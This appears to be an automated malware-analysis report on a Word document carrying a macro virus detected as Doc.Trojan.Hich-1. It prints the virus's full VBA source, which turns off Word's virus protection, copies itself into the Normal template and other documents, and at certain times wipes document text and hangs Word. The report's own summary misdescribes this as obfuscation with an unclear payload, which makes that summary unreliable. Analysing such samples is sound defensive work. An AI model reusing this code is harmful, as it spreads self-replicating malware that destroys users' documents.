Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 743a79513809ab69…

MALICIOUS

Office (OLE)

36.5 KB Created: 2000-08-16 07:03:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: da42fff77180374d951e2a4d79a5f4ac SHA-1: 69768f648bfb41ab368eace699c765ad006916d6 SHA-256: 743a79513809ab69501cfa411c0017f34b0eac59caf9c1880009ffb824cd3d7e
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macros appear to be designed to obfuscate their own code and potentially modify the document content, as indicated by the `CIH` subroutine and the manipulation of document ranges. The `ClamAV: Doc.Trojan.Hich-1` detection further supports its malicious nature. The exact payload or behavior is unclear due to macro obfuscation and truncation.

Heuristics 2

  • ClamAV: Doc.Trojan.Hich-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hich-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1959 bytes
SHA-256: 59f4192feb218fb436f8b6faecf0aaa5106471733837ba9aef0c0a1b72c6dbe3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    CIH
End Sub

Private Sub CIH()
    On Error Resume Next
    Dim StartLoc, ProcLen, Obj, Str, i, s, Lose
    s = ActiveDocument.Saved: Application.EnableCancelKey = 0
    With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
    
    Set Obj = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
    StartLoc = Obj.ProcStartLine("CIH", 0): ProcLen = Obj.ProcCountLines("CIH", 0)
    Str = Obj.Lines(StartLoc, ProcLen)
    
    Set Obj = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    i = Empty: i = Obj.ProcStartLine("CIH", 0)
    If i <> Empty Then
        Set Obj = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
        i = Empty: i = Obj.ProcStartLine("CIH", 0)
        If i <> Empty Then Obj = ""
    End If
    
    If Obj <> "" Then
        i = Empty: i = Obj.ProcStartLine("Document_Close", 0)
        If i = Empty Then
            Obj.InsertLines Obj.CountOfLines + 1, "Private Sub Document_Close()" & Chr(13) & "    CIH" & Chr(13) & "End Sub"
        Else
            Obj.InsertLines Obj.ProcStartLine("Document_Close", 0) + 1, "    CIH"
        End If
        Obj.InsertLines Obj.CountOfLines + 1, Str
    End If
    
    If Minute(Now) = 1 Then ActiveDocument.Range(ActiveDocument.Characters.Count / 2 * (1 - 0.1 * Rnd), ActiveDocument.Characters.Count / 2 * (1 + 0.1 * Rnd)) = ""
    If Minute(Now) = 26 Then ActiveDocument.Range(0, ActiveDocument.Characters.Count) = "": Lose = True
    If s = False Then ActiveDocument.Save
    If Lose = True And ActiveDocument.Saved Then Do: Loop
    ActiveDocument.Saved = True
End Sub